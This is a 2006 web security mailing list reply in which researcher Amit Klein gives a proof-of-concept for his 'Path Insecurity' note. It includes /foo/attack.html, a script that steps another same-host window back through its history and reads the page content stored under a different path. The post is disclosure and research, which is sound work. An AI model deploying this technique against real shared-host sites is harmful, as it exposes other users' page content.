
Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"



On 2 May 2006 at 13:42, Brian Eaton wrote:

> 
> I know the browser has the previous version of /bar/page1.html around
> even with "no-cache" headers, because I can view it with the forward
> and back buttons in my browser.  But I can't figure out how to get to
> it with javascript.  You mentioned traversing the history list in your
> original note - do you still have that code around?
> 

Sure, here is a demo (BTW - I noticed a typo in my original manuscript - the 
history object method is called "back()", not "prev()". Sorry for that):

/bar/page1.html:

<html>
<body>
This is page one.
<a href="/bar/page2.html">Go to the next page</a>
</body>
</html>


/bar/page2.html:

<html>
<body>
This is page two.
</body>
</html>


/foo/attack.html:

<html>
<body>
<script>
var H;  // handle to the window opened on the same host (different path)

function getprev()
{
	// Step the opened window back one history entry (to /bar/page1.html)
	H.history.back();
	// Give the back navigation time to complete, then read the restored page's DOM
	setTimeout(function () { alert(H.document.body.innerHTML); }, 3000);
}

// Open /bar/page1.html in a new window; the user is expected to follow its
// link to /bar/page2.html within the next 15 seconds
H = window.open("/bar/page1.html");
setTimeout(getprev, 15000);
</script>
</body>
</html>


Now, fire up /foo/attack.html. It will open another window for /bar/page1.html. Quickly 
(within 15 seconds) click the link in /bar/page1.html to move to /bar/page2.html (in 
the same window). Then wait, and within 18 seconds you'll see that the page navigates back 
to /bar/page1.html and foo reads that page and displays its HTML content.

Hope that helps,
-Amit

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
